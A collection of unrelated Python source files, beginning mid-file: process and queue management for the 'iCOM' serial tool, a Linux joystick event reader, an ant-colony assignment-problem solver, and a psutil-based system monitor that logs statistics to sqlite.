def netsrv_process(pro_name,cur_instance_num,win_title,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_Q,pro_status):
import ICOM_netsrv
ICOM_netsrv.netsrv_set_vars(cur_instance_num,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_Q)
pro_ok = 0
pro_fail = 0
gui_Q.put(('READY','NETSRV',os.getpid()))
while True: #ctrl quit status
try:
msg_data = netsrv_ctrl_Q.get()
#print ('work',msg_data)
if msg_data[0] == 'QUIT':
pro_status[3] = 1
ICOM_netsrv.netsrv_msg_proc(*msg_data)
break
ICOM_netsrv.netsrv_msg_proc(*msg_data)
pro_ok += 1
except Exception as e:
print ('netsrv process exception',e,msg_data)
pro_fail += 1
pass
print ('netsrv process quit ok:%d,fail:%d\n'%(pro_ok,pro_fail))
os._exit(0)
def send_quit_message_to_process(ctrl_Q):
try:
ctrl_Q.put(('QUIT',100))
except Exception as e:
print ('send_quit_message_to_process err:%s'%e)
pass
def sys_tray_process(pro_name,cur_instance_num,win_title,share_list,tray_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status,trayTimerCallback):
from pywin32_sys_tray import win_sys_tray
sysTray = win_sys_tray()
sysTray.sys_tray_init(cur_instance_num,win_title,share_list,tray_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status)
sysTray.sys_tray_setup_extimer(1000,trayTimerCallback)
sysTray.sys_tray_start()
os._exit(0)
class StdoutQueue(Queue):
def __init__(self, maxsize=0):
Queue.__init__(self,maxsize,ctx=multiprocessing)
def get_timestamp(self):
t = datetime.now()
return t.strftime("%Y-%m-%d %H:%M:%S.%f")
def write(self,msg):
if msg != '\r\n' and msg != '\n' and msg != ' ':
log_msg = '%s %s'%(self.get_timestamp(),msg)
else:
log_msg = msg
self.put(log_msg)
def error(self,msg):
log_msg = '%s %s\n'%(self.get_timestamp(),msg)
self.put(log_msg)
def debug(self,msg):
log_msg = '%s %s\n'%(self.get_timestamp(),msg)
self.put(log_msg)
def info(self,msg):
log_msg = '%s %s\n'%(self.get_timestamp(),msg)
self.put(log_msg)
def flush(self):
if sys.__stdout__:
sys.__stdout__.flush()
log_file = None
def open_file_log():
global log_file
try:
if is_in_frozen_state():
t = datetime.now()
f_name = os.path.abspath(os.path.join('log','icom_debug%d_%s.log'%(g_cur_instance_num,t.strftime("%M"))))
log_file = open(f_name,'w')
print ('start log:%s %s'%(f_name,log_file))
except:
pass
def record_file_log(log_Q, pro_status):
global log_file
if not log_file:
return
while True:
try:
msg_data = log_Q.get_nowait()
if msg_data:
log_file.write(msg_data)
else:
break
except Exception as e:
break
def record_file_log_flush():
if log_file:
log_file.flush()
def close_file_log(pro_status):
if log_file:
t = datetime.now()
log_file.write('%s pro_status:%s\n'%(t.strftime("%Y-%m-%d %H:%M:%S %f"),pro_status[:]))
log_file.flush()
log_file.close()
def is_module_exists(module_name):
_is_exists = False
try:
__import__(module_name)
_is_exists = True
except ImportError:
pass
return _is_exists
def is_in_frozen_state():
if hasattr(sys, 'frozen') and hasattr(sys, '_MEIPASS'):
global IN_FROZEN_STATE
IN_FROZEN_STATE = True
return sys._MEIPASS
return None
def get_app_title(instance_num):
app_tile = 'iCOM for Windows'
if os.name.upper() != 'NT':
app_tile = 'iCOM for %s'%os.name
if instance_num > 0:
app_tile = '%s (%d)'%(app_tile,instance_num)
return app_tile
def get_instance_num():
instance_num = 0
try:
instance_num = int(win_instance.get_instance_num(10, 'py-instance-num'))
print ('instance_num',instance_num)
if instance_num > 0:
instance_num = instance_num - 1
except Exception as e:
print ('get_instance_num err:%s'%e)
pass
return instance_num
frozen_dir_clean = False
frozen_dirs_list = []
import shutil
def get_frozen_tem_dir_prefix(cur_tmp_dir):
base_name = os.path.basename(cur_tmp_dir)
_prefix = ''.join([_ for _ in base_name if not _.isdigit()])
return _prefix
def get_forzen_dirs():
frozen_dir = is_in_frozen_state()
if frozen_dir:
frozen_parent_dir = os.path.abspath(os.path.join(frozen_dir,'..'))
frozen_dir = frozen_dir[0:-1] if frozen_dir[-1] == os.sep else frozen_dir
frozen_prefix = get_frozen_tem_dir_prefix(frozen_dir)
return frozen_dir,frozen_parent_dir,frozen_prefix
return None,None,None
def clean_frozen_tmp_dir(cur_tmp_dir,frozen_parent_dir,frozen_prefix,cur_exe):
global frozen_dir_clean
global frozen_dirs_list
if frozen_dir_clean is True:
return
try:
if not frozen_dirs_list:
dir_list = os.listdir(frozen_parent_dir)
frozen_dirs_list = [os.path.join(frozen_parent_dir,x) for x in dir_list if x != cur_tmp_dir and x.startswith(frozen_prefix) ]
if frozen_dirs_list:
st_time_sec = os.stat(frozen_dirs_list[-1]).st_ctime
today = datetime.today()
st_time = datetime.fromtimestamp(st_time_sec)
pass_time = today - st_time
cur_del_dir = frozen_dirs_list[-1]
del frozen_dirs_list[-1]
if not frozen_dirs_list:
frozen_dir_clean = True
if pass_time.days >= 3 and os.path.exists(os.path.join(cur_del_dir,'%s.manifest'%cur_exe)):
os.remove(os.path.join(cur_del_dir,'_multiprocessing.pyd'))
os.remove(os.path.join(cur_del_dir,'_ctypes.pyd'))
shutil.rmtree(cur_del_dir)
except Exception as e:
print ('clean tmp file err:%s\n'%e)
pass
return
class win_gui_Queue(Queue):
__SAMPLE_SIZE = 4
__MAX_MSG_RATE_THREDHOLD = 80
__sync_flow_ctrl_count = 0
__flow_ctrl_interger = 0
__flow_ctrl_remainder = 0
__msg_count = 0
__real_proc_data_msg_count = 0
__msg_reminder_count = 0
__data_queue_msg_count = 0
__nodata_timeout_count = 0
sync_ctrl_Q = None
__send_lock = dummyLock()
def __init__(self,maxsize=0):
Queue.__init__(self,maxsize,ctx=multiprocessing)
self.__timer_ctrl_func = None
self._flow_ctrl = icom_flow_ctrl.flow_ctrl(current_thread().ident)
self._win_msg = None
self.__buffer_msg = []
self._flow_ctrl.set_timer_req_function(self.req_timer_ctrl_Q_cmd)
self._flow_ctrl.set_flow_ctrl_req_function(self.req_flow_ctrl_Q_cmd)
self._flow_ctrl.set_enable(True)
def set_win_pid(self,win_pid):
self._win_msg = icom_win_msg.win_msg(win_pid)
def set_timer_ctrl_function(self,timer_ctrl_func):
self.__timer_ctrl_func = timer_ctrl_func
def req_timer_ctrl_Q_cmd(self,cmd,timer_id,timer_len):
if self.__timer_ctrl_func:
self.__timer_ctrl_func(cmd,timer_id,timer_len)
def req_flow_ctrl_Q_cmd(self,cmd,ctrl_msg_count):
self.flow_ctrl(ctrl_msg_count)
def set_sync_ctrl_Q(self,sync_ctrl_Q):
win_gui_Queue.sync_ctrl_Q = sync_ctrl_Q
win_gui_Queue.__sync_flow_ctrl_count = win_gui_Queue.__SAMPLE_SIZE
win_gui_Queue.__msg_count = 0
win_gui_Queue.__msg_reminder_count = 0
def flow_ctrl(self,msg_count):
#collect and group data msg count(unit 1/4), 6 means group 6/4(1.5) packet and send a sync ctrl message. <=4 means do not group data message.
#win_gui_Queue.__send_lock.acquire()
if msg_count > 4:
interger = msg_count//win_gui_Queue.__SAMPLE_SIZE
reminder = msg_count%win_gui_Queue.__SAMPLE_SIZE
if reminder > 0:
win_gui_Queue.__flow_ctrl_interger = interger + 1
new_reminder = win_gui_Queue.__SAMPLE_SIZE - reminder
win_gui_Queue.__flow_ctrl_remainder = (win_gui_Queue.__flow_ctrl_interger * msg_count + reminder//2)//new_reminder
else:
win_gui_Queue.__flow_ctrl_interger = interger
win_gui_Queue.__flow_ctrl_remainder = 0
win_gui_Queue.__sync_flow_ctrl_count = msg_count #enable flow ctrl now
print ('flow-ctrl set:%d,%d,%d,%d'%(msg_count,win_gui_Queue.__flow_ctrl_interger,win_gui_Queue.__flow_ctrl_remainder,win_gui_Queue.__msg_count))
else:
win_gui_Queue.__sync_flow_ctrl_count = win_gui_Queue.__SAMPLE_SIZE
win_gui_Queue.__flow_ctrl_interger = 0
win_gui_Queue.__flow_ctrl_remainder = 0
print ('flow-ctrl set',msg_count)
cur_msg_count = win_gui_Queue.__msg_count
#win_gui_Queue.__send_lock.release()
#self.do_send_ctrl_msg(ICOM_CTRL_MSG.ID_FLOW_CTRL_CNF,msg_count,cur_msg_count)
self._flow_ctrl.process_flow_ctrl(ICOM_CTRL_MSG.ID_FLOW_CTRL_CNF, msg_count,cur_msg_count, 0, 0)
def get_flow_ctrl_info(self):
return win_gui_Queue.__sync_flow_ctrl_count,win_gui_Queue.__flow_ctrl_interger,win_gui_Queue.__flow_ctrl_remainder
def do_send_ctrl_msg(self,msg_int_type,msg_int_param1=None,msg_int_param2=None,msg_int_param3=None,msg_int_param4=None):
if not win_gui_Queue.sync_ctrl_Q:
return
if win_gui_Queue.sync_ctrl_Q.full():
print('self.sync_ctrl_Q full full full')
return
msg_para_list = (msg_int_type,msg_int_param1)
if msg_int_param4:
msg_para_list = (msg_int_type,msg_int_param1,msg_int_param2,msg_int_param3,msg_int_param4)
elif msg_int_param3:
msg_int_param4 = 0
msg_para_list = (msg_int_type,msg_int_param1,msg_int_param2,msg_int_param3)
elif msg_int_param2:
msg_int_param3 = msg_int_param4 = 0
msg_para_list = (msg_int_type,msg_int_param1,msg_int_param2)
elif msg_int_param1:
msg_int_param2 = msg_int_param3 = msg_int_param4 = 0
else:
msg_int_param1 = msg_int_param2 = msg_int_param3 = msg_int_param4 = 0
msg_para_list = (msg_int_type,)
win_gui_Queue.__send_lock.acquire()
data_queue_msg_count = self.__data_queue_msg_count
if msg_int_type == ICOM_CTRL_MSG.ID_TIMER_TIMEOUT:
win_gui_Queue.__real_proc_data_msg_count = 0
else:
win_gui_Queue.__real_proc_data_msg_count += 1
need_continue_proc = self._flow_ctrl.process_flow_ctrl(msg_int_type, msg_int_param1, msg_int_param2, msg_int_param3, msg_int_param4)
win_gui_Queue.__send_lock.release()
if need_continue_proc is False:
#print ('nd',msg_int_type)
return
if data_queue_msg_count <= 0 and msg_int_type == ICOM_CTRL_MSG.ID_SEND_DATA_CNF_OK:
#print ('cd')
return
if msg_int_type == ICOM_CTRL_MSG.ID_PROC_QUIT_MSG or msg_int_type == ICOM_CTRL_MSG.ID_TIMER_TIMEOUT:
if not self._win_msg or self._win_msg.send_sync_msg(msg_para_list) is False:
return win_gui_Queue.sync_ctrl_Q.put(msg_para_list)
else:
return win_gui_Queue.sync_ctrl_Q.put(msg_para_list)
def send_data_sync_msg(self,msg_obj=None,msg_type=None,force_sync=None):
need_send_ctrl_msg = False
win_gui_Queue.__send_lock.acquire()
win_gui_Queue.__msg_count += 1
win_gui_Queue.__msg_reminder_count += 1
data_msg_cnt = win_gui_Queue.__sync_flow_ctrl_count
if force_sync is True:
need_send_ctrl_msg = True
data_msg_cnt = (win_gui_Queue.__msg_count + win_gui_Queue.__msg_reminder_count)*win_gui_Queue.__SAMPLE_SIZE//2
win_gui_Queue.__msg_count = 0
win_gui_Queue.__msg_reminder_count = 0
elif win_gui_Queue.__msg_count >= win_gui_Queue.__flow_ctrl_interger:
need_send_ctrl_msg = True
win_gui_Queue.__msg_count = 0
elif win_gui_Queue.__msg_reminder_count >= win_gui_Queue.__flow_ctrl_remainder > win_gui_Queue.__flow_ctrl_interger:
need_send_ctrl_msg = True
win_gui_Queue.__msg_reminder_count = 0
if msg_obj:
self.__data_queue_msg_count += 1
if self.__buffer_msg:
self.__buffer_msg.append(msg_obj)
elif win_gui_Queue.__sync_flow_ctrl_count >= win_gui_Queue.__SAMPLE_SIZE *5:
self.__buffer_msg.append(msg_obj)
else:
Queue.put(self,msg_obj)
if need_send_ctrl_msg is True:
if self.__buffer_msg:
Queue.put(self,self.__buffer_msg)
self.__buffer_msg = []
self.__data_queue_msg_count = 0
elif len(self.__buffer_msg) > 3:
Queue.put(self,self.__buffer_msg)
self.__buffer_msg = []
win_gui_Queue.__send_lock.release()
if need_send_ctrl_msg is True:
self.do_send_ctrl_msg(msg_type if msg_type else ICOM_CTRL_MSG.ID_PROC_DATA_MSG,data_msg_cnt)
def __put(self, obj, block=True, timeout=None):
if win_gui_Queue.__sync_flow_ctrl_count <= win_gui_Queue.__SAMPLE_SIZE:
Queue.put(self,obj, block, timeout)
if win_gui_Queue.__real_proc_data_msg_count > win_gui_Queue.__MAX_MSG_RATE_THREDHOLD:
self.flow_ctrl(win_gui_Queue.__real_proc_data_msg_count*win_gui_Queue.__SAMPLE_SIZE//(win_gui_Queue.__MAX_MSG_RATE_THREDHOLD))
return self.do_send_ctrl_msg(ICOM_CTRL_MSG.ID_PROC_DATA_MSG, win_gui_Queue.__SAMPLE_SIZE)
self.send_data_sync_msg(obj)
def put(self, obj, block=True, timeout=None):
self.__put(obj, block, timeout)
def do_send_quit_msg(self):
self.do_send_ctrl_msg(ICOM_CTRL_MSG.ID_PROC_QUIT_MSG)
def do_sync(self):
self.send_data_sync_msg(None,ICOM_CTRL_MSG.ID_FORCE_SYNC_MSG,True)
def do_timer_out(self,timer_id,timer_len):
return self.do_send_ctrl_msg(ICOM_CTRL_MSG.ID_TIMER_TIMEOUT,timer_id,timer_len)
def do_cmd_cnf(self,cmd_type, port_name, result_code, result_str=None):
if result_code == 0 and (cmd_type == "SI" or cmd_type == "S"):
self.send_data_sync_msg(None,ICOM_CTRL_MSG.ID_SEND_DATA_CNF_OK)
else:
self.__put(("C",cmd_type,port_name,result_code,result_str))
def put_nowait(self, obj):
self.send_data_sync_msg(obj)
def set_app_title(self,app_title):
pass
def icom_main(argv):
global g_cur_instance_num
g_cur_instance_num = cur_instance_num = get_instance_num()
#add instance
win_instance.pyi_add_instance_num()
win_title = get_app_title(g_cur_instance_num)
process_work = None
process_tray = None
pro_status = multiprocessing.Array('i', [0 for i in range(8)])
current_process = multiprocessing.current_process()
print ('current_process',current_process.pid,current_process.name)
ports_ctrl_Q = multiprocessing.Queue()
tray_ctrl_Q = multiprocessing.Queue(maxsize=1)
gui_sync_ctrl_Q = multiprocessing.Queue()
gui_data_Q = win_gui_Queue()
gui_data_Q.set_sync_ctrl_Q(gui_sync_ctrl_Q)
manager_Q = multiprocessing.Queue()
netsrv_ctrl_Q = None
if is_module_exists('ICOM_netsrv'):
netsrv_ctrl_Q = multiprocessing.Queue()
__stdout = StdoutQueue()
process_netsrv = None
process_gui = multiprocessing.Process(target=gui_process,name='GUI',
args=('main-gui',cur_instance_num,win_title,manager_Q,ports_ctrl_Q,tray_ctrl_Q,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status,__stdout))
process_gui.start()
gui_data_Q.set_win_pid(process_gui.pid)
gui_data_Q.set_timer_ctrl_function(lambda cmd,timer_id,timer_len:ports_ctrl_Q.put((cmd,timer_id,timer_len)))
#process_tray = dummyProcess(target=sys_tray_process,name='TRAY', args=('sys-tray',cur_instance_num,win_title,manager_Q,tray_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status))
process_work = dummyProcess(target=work_ports_process,name='PORTS', args=('work-ports',cur_instance_num,win_title,manager_Q,ports_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q))
if netsrv_ctrl_Q:
process_netsrv = dummyProcess(target=netsrv_process,name='NETSRV', args=('net-srv',cur_instance_num,win_title,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status))
print ('start_process')
#process_tray.setDaemon(True)
#process_tray.start()
process_work.setDaemon(True)
process_work.start()
#if process_netsrv:
# process_netsrv.setDaemon(True)
# process_netsrv.start()
#current_process.daemon = True
open_file_log()
if is_in_frozen_state():
sys.stdout = __stdout
sys.stderr = __stdout
print ('gui',process_gui.pid)
#print ('tray',process_tray.pid)
#print ('ports',process_work.pid)
#if process_netsrv:
# print ('netsrv',process_netsrv.pid)
frozen_dir,frozen_parent_dir,frozen_prefix = get_forzen_dirs()
def tray_periel_callback(lparam, loop_count):
cur_exe = os.path.basename(argv[0] if len(argv) > 0 else 'ICOM.exe')
if not process_gui.is_alive() or 0 != pro_status[0]:
send_quit_message_to_process(tray_ctrl_Q)
return 0
try:
#delay 3 sec to startup netsrv process
if NET_SRV_PROCESS_DELAY_START == loop_count and isinstance(process_netsrv,(multiprocessing.Process,dummyProcess)):
print ('process_netsrv start')
process_netsrv.setDaemon(True)
process_netsrv.start()
#print ('netsrv',process_netsrv.pid)
#print ('active_children',multiprocessing.active_children())
#print ('process_work need restart',ports_ctrl_Q.__dict__)
if not isinstance(process_work,(multiprocessing.Process,dummyProcess)) or not process_work.is_alive():
print ('process_work quit:%d'%loop_count)
if (NET_SRV_PROCESS_DELAY_START < loop_count) and process_netsrv and (not isinstance(process_netsrv,(multiprocessing.Process,dummyProcess)) or not process_netsrv.is_alive()):
print ('process_netsrv quit:%d'%loop_count)
if frozen_dir and cur_instance_num == 0:
clean_frozen_tmp_dir(frozen_dir,frozen_parent_dir,frozen_prefix,cur_exe)
record_file_log(__stdout,pro_status)
if loop_count % 10 == 0:
record_file_log_flush()
#loop_count = loop_count + 1 if loop_count < 30000 else NET_SRV_PROCESS_DELAY_START + 1
except Exception as e:
print ('check exception %s'%e)
pass
return loop_count + 1 if loop_count < 30000 else NET_SRV_PROCESS_DELAY_START + 1
sys_tray_process('sys-tray',cur_instance_num,win_title,manager_Q,tray_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status,tray_periel_callback)
try:
win_instance.pyi_release_instance_num()
gui_exit_code = process_gui.exitcode
print ('process_gui.exitcode',gui_exit_code)
if 0:
send_quit_message_to_process(ctrl_Q)
print ('process ctrl_Q ok')
#send_quit_message_to_process(tray_ctrl_Q)
#print ('process tray_ctrl_Q ok')
if netsrv_ctrl_Q:
send_quit_message_to_process(netsrv_ctrl_Q)
print ('process netsrv_ctrl_Q ok')
process_gui.join(timeout = 3)
print ('process_gui.ok')
#if process_tray and isinstance(process_tray,(multiprocessing.Process,dummyProcess)):
# if process_tray.is_alive() and hasattr(process_tray,'terminate'):
# process_tray.terminate()
# print ('process_tray.exitcode',process_tray.exitcode)
# process_tray.join(timeout = 3)
if process_work and isinstance(process_work,(multiprocessing.Process,dummyProcess)):
if process_work.is_alive() and hasattr(process_tray,'terminate'):
process_work.terminate()
print ('process_work.exitcode',process_work.exitcode)
process_work.join(timeout = 3)
if process_netsrv and isinstance(process_netsrv,(multiprocessing.Process,dummyProcess)) and hasattr(process_tray,'terminate'):
process_netsrv.terminate()
print ('process_netsrv.exitcode',process_netsrv.exitcode)
process_netsrv.join(timeout = 3)
except Exception as e:
print ('terminate exception %s'%e)
pass
print ('process share status %s'%pro_status[:])
record_file_log(__stdout,pro_status)
print ('record log.ok')
close_file_log(pro_status)
print ('all quit.ok')
return 0
|
joystick.py
|
#
# Copyright 2016-2017 Games Creators Club
#
# MIT License
#
import time
import array
import struct
import threading
from fcntl import ioctl
disabled = False
# We'll store the states here.
axis_states = {}
button_states = {}
# These constants were borrowed from linux/input.h
axis_names = {
0x00: 'x',
0x01: 'y',
0x02: 'z',
0x03: 'rx',
0x04: 'ry',
0x05: 'rz',
0x06: 'trottle',
0x07: 'rudder',
0x08: 'wheel',
0x09: 'gas',
0x0a: 'brake',
0x10: 'hat0x',
0x11: 'hat0y',
0x12: 'hat1x',
0x13: 'hat1y',
0x14: 'hat2x',
0x15: 'hat2y',
0x16: 'hat3x',
0x17: 'hat3y',
0x18: 'pressure',
0x19: 'distance',
0x1a: 'tilt_x',
0x1b: 'tilt_y',
0x1c: 'tool_width',
0x20: 'volume',
0x28: 'misc',
}
button_names = {
0x120: 'trigger',
0x121: 'thumb',
0x122: 'thumb2',
0x123: 'top',
0x124: 'top2',
0x125: 'pinkie',
0x126: 'base',
0x127: 'base2',
0x128: 'base3',
0x129: 'base4',
0x12a: 'base5',
0x12b: 'base6',
0x12f: 'dead',
0x130: 'a',
0x131: 'b',
0x132: 'c',
0x133: 'x',
0x134: 'y',
0x135: 'z',
0x136: 'tl',
0x137: 'tr',
0x138: 'tl2',
0x139: 'tr2',
0x13a: 'select',
0x13b: 'start',
0x13c: 'mode',
0x13d: 'thumbl',
0x13e: 'thumbr',
0x220: 'dpad_up',
0x221: 'dpad_down',
0x222: 'dpad_left',
0x223: 'dpad_right',
# XBo 360 controller uses these codes.
0x2c0: 'dpad_left',
0x2c1: 'dpad_right',
0x2c2: 'dpad_up',
0x2c3: 'dpad_down',
}
axis_map = []
button_map = []
# Open the joystick device.
fn = '/dev/input/js0'
# print('Opening %s...' % fn)
jsdev = open(fn, 'rb')
# Get the device name.
# buf = bytearray(63)
# buf = array.array('c', ['\0'] * 64)
buf = array.array('b', [0] * 64)
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
js_name = buf.tostring()
# print('Device name: %s' % js_name)
# Get number of axes and buttons.
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
# Get the axis map.
buf = array.array('B', [0] * 0x40)
ioctl(jsdev, 0x80406a32, buf) # JSIOCGAXMAP
for axis in buf[:num_axes]:
axis_name = axis_names.get(axis, 'unknown(0x%02x)' % axis)
axis_map.append(axis_name)
axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:num_buttons]:
btn_name = button_names.get(btn, 'unknown(0x%03x)' % btn)
button_map.append(btn_name)
button_states[btn_name] = 0
# print '%d axes found: %s' % (num_axes, ', '.join(axis_map))
# print '%d buttons found: %s' % (num_buttons, ', '.join(button_map))
def readEvents():
evbuf = jsdev.read(8)
if evbuf:
time, value, event_type, number = struct.unpack('IhBB', evbuf)
# print("Got event " + str(value) + "," + str(event_type) + "," + str(number))
# if type & 0x80:
# print "(initial)",
if event_type & 0x01:
button = button_map[number]
if button:
button_states[button] = value
# if value:
# print "%s pressed" % (button)
# else:
# print "%s released" % (button)
if event_type & 0x02:
selected_axis = axis_map[number]
if selected_axis:
fvalue = value / 32767.0
axis_states[selected_axis] = fvalue
def readEventsLoop():
while True:
if not disabled:
readEvents()
else:
time.sleep(0.2)
def startNewThread():
thread = threading.Thread(target=readEventsLoop, args=())
thread.daemon = True
thread.start()
|
main.py
|
import os
import random
import multiprocessing as mp
import numpy
import time
from job3 import *
P_COUNT = os.cpu_count()
PRINT_EACH_ITERATION = True
PRINT_COST_CALCULATION = False
class AP:
def __init__(self, path: str):
with open(path) as f:
self.costs = list(map(lambda line: list(map(int, line.split())), f.readlines()))
self.count = len(self.costs)
for _ in range(self.count):
self.pheromones = [[1 / self.costs[i][j] for j in range(self.count)] for i in range(self.count)]
self.colony = [Ant(self) for _ in range(COLONY_POPULATION)]
self.total_best_ant_cost = None
self.total_best_ant_assignments = None
def step(self, k):
for ant in self.colony:
ant.assign(k)
def evaporate(self):
for i in range(self.count):
for j in range(self.count):
self.pheromones[i][j] *= (1 - EVAPORATION_PARAMETER)
def secret_pheromones(self):
for ant in self.colony:
ant.calculate_cost()
delta = 1 / ant.cost
for i in range(self.count):
j = ant.assignments[i]
self.pheromones[i][j] += delta
if self.total_best_ant_cost is not None:
e_delta = ELITISM / self.total_best_ant_cost
for i in range(self.count):
j = self.total_best_ant_assignments[i]
self.pheromones[i][j] += e_delta
def iterate(self):
if PARALLEL:
def chunk_assgin(indices, ants, rd):
for i in range(len(indices)):
for k in range(self.count):
ants[i].assign(k)
rd[indices[i]] = ants[i].assignments
chunks = numpy.array_split(range(len(self.colony)), P_COUNT)
manager = mp.Manager()
rd = manager.dict()
processes = [
mp.Process(target=chunk_assgin, args=(chunk, self.colony[chunk[0]:chunk[-1] + 1], rd))
for chunk in chunks
]
for p in processes:
p.start()
for p in processes:
p.join()
for i in range(len(self.colony)):
self.colony[i].assignments = rd[i]
else:
for k in range(self.count):
self.step(k)
self.evaporate()
self.secret_pheromones()
def solve(self):
i = 0
stagnancy = 0
while True:
self.iterate()
i += 1
new_best_ant = min(self.colony, key=lambda ant: ant.cost)
if self.total_best_ant_cost is not None:
if self.total_best_ant_cost - new_best_ant.cost < IMPROVEMENT_THRESHOLD:
stagnancy += 1
if stagnancy >= STAGNANCY_THRESHOLD:
break
else:
stagnancy = 0
if self.total_best_ant_cost is None or new_best_ant.cost < self.total_best_ant_cost:
self.total_best_ant_cost = new_best_ant.cost
self.total_best_ant_assignments = new_best_ant.assignments.copy()
if PRINT_EACH_ITERATION:
print(f'Iteration {i}: Total best is {self.total_best_ant_cost} while iteration best is {new_best_ant.cost}')
return [self.total_best_ant_cost, self.total_best_ant_assignments]
class Ant:
def __init__(self, ap: AP):
self.ap = ap
self.assignments = [-1] * self.ap.count
self.cost = None
def assign(self, k):
weights = [
(self.ap.pheromones[k][i] ** ALPHA) * ((1 / self.ap.costs[k][i]) ** BETA)
if i not in self.assignments[:k] else 0
for i in range(self.ap.count)
]
self.assignments[k] = random.choices(range(self.ap.count), weights=weights, k=1)[0]
def calculate_cost(self):
self.cost = sum([self.ap.costs[i][self.assignments[i]] for i in range(self.ap.count)])
ap = AP(FILE_PATH)
t_start = time.time()
answer = ap.solve()
t_end = time.time()
print(f'Took: {t_end - t_start:.5f} seconds')
print(f'Cost: {answer[0]}')
print('Assignments:', end=' ')
print(answer[1])
if PRINT_COST_CALCULATION:
print('+'.join([str(ap.costs[i][answer[1][i]]) for i in range(len(answer[1]))]) + '=' + str(answer[0]))
|
capture.py
|
#!/usr/bin/env python
import os
import sys
import time
import string
import sqlite3
import subprocess
from multiprocessing import Process
import psutil as ps
db1_host = "localhost"
db_files = {"monitor": { "db_filename": "/opt/sys_monitor/db/monitor.db",
"schema_filename": "/opt/sys_monitor/db/sql_schema.sql"},
"db1_qry": { "db_filename": "/opt/sys_monitor/db/db1_qry-monitor.db",
"schema_filename": "/opt/sys_monitor/db/db1_qry-sql_schema.sql"}
}
for x in db_files:
db_file = db_files[x]["db_filename"]
schema_file = db_files[x]["schema_filename"]
db_is_new = not os.path.exists(db_file)
with sqlite3.connect(db_file) as conn:
if db_is_new:
print 'Creating schema'
with open(schema_file, 'rt') as f:
schema = f.read()
conn.executescript(schema)
#conn.commit()
#conn.close()
else:
print 'Database ', db_file, 'exists, assume schema ', schema_file, 'does, too.'
#sys.exit(1)
# sleep at first to start stats
time.sleep(1)
def qryTime():
start_time = int(time.time())
subprocess.call(['/opt/sys_monitor/conf/test_db1_apps.sh', db1_host], stdout=subprocess.PIPE, shell=False, stderr=subprocess.PIPE)
time.sleep(5)
end_time = int(time.time())
date_time = end_time
db1_qry = end_time - start_time
if db1_qry < 3:
time.sleep(60)
rowid = 1
conn = sqlite3.connect('/opt/sys_monitor/db/db1_qry-monitor.db')
cursor = conn.cursor()
t = [rowid, date_time, db1_qry ]
conn.execute('INSERT OR REPLACE INTO db1Qry values (?,?,?)', t)
#print t
conn.commit()
def statTime():
disks1 = ps.disk_io_counters(perdisk=True)
dsk1_0b = disks1["sd1"]
dsk1_0c = disks1["sd2"]
net1 = ps.net_io_counters(pernic=True)
net1_all = net1["net0"]
time.sleep(2)
date_time = int(time.time())
cpu = ps.cpu_times_percent()
mem = ps.virtual_memory()
swap = ps.swap_memory()
disks2 = ps.disk_io_counters(perdisk=True)
net2 = ps.net_io_counters(pernic=True)
cpu_usr = int(round(cpu[0],3))
cpu_sys = int(round(cpu[1],3))
cpu_tot = int(round(cpu[0] + cpu[1],3))
# Conversion below - (0, 'B'), (10, 'KB'),(20, 'MB'),(30, 'GB'),(40, 'TB'), (50, 'PB')
mem_usd = int(round(mem[3] / 2 ** 20))
mem_tot = int(round(mem[0] / 2 ** 20))
swp_usd = int(round(swap[1] / 2 ** 20))
swp_tot = int(round(swap[0] / 2 ** 20))
dsk2_0b = disks2["sd1"]
dsk2_0c = disks2["sd2"]
dsk_0b_rop = (dsk2_0b[0] - dsk1_0b[0])
dsk_0b_wop = (dsk2_0b[1] - dsk1_0b[1])
dsk_0b_rmb = (dsk2_0b[2] - dsk1_0b[2]) / 1024 / 1024
dsk_0b_wmb = (dsk2_0b[3] - dsk1_0b[3]) / 1024 / 1024
dsk_0b_rtm = (dsk2_0b[4] - dsk1_0b[4])
dsk_0b_wtm = (dsk2_0b[5] - dsk1_0b[5])
dsk_0c_rop = (dsk2_0c[0] - dsk1_0c[0])
dsk_0c_wop = (dsk2_0c[1] - dsk1_0c[1])
dsk_0c_rmb = (dsk2_0c[2] - dsk1_0c[2]) / 1024 / 1024
dsk_0c_wmb = (dsk2_0c[3] - dsk1_0c[3]) / 1024 / 1024
dsk_0c_rtm = (dsk2_0c[4] - dsk1_0c[4])
dsk_0c_wtm = (dsk2_0c[5] - dsk1_0c[5])
net2_all = net2["net1"]
net_smb = (net2_all[0] - net1_all[0]) / 1024 / 1024 / 2
net_rmb = (net2_all[1] - net1_all[1]) / 1024 / 1024 / 2
ses_c = subprocess.Popen(['/opt/sys_monitor/conf/chk_db1_apps-ses.sh', db1_host], stdout=subprocess.PIPE, shell=False, stderr=subprocess.PIPE)
stdout = ses_c.communicate()[0]
db1_ses = filter(type(stdout).isdigit, stdout)
rowid = 1
conn = sqlite3.connect('/opt/sys_monitor/db/monitor.db')
cursor = conn.cursor()
t = [rowid, date_time, cpu_usr, cpu_sys, cpu_tot,
mem_usd, mem_tot, swp_usd, swp_tot,
dsk_0b_rop, dsk_0b_wop, dsk_0b_rmb, dsk_0b_wmb, dsk_0b_rtm, dsk_0b_wtm,
dsk_0c_rop, dsk_0c_wop, dsk_0c_rmb, dsk_0c_wmb, dsk_0c_rtm, dsk_0c_wtm,
net_smb, net_rmb, db1_ses
]
conn.execute('INSERT OR REPLACE INTO monitor values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', t)
#print t
conn.commit()
def chkDb():
while True:
qryTime()
def chkStats():
while True:
statTime()
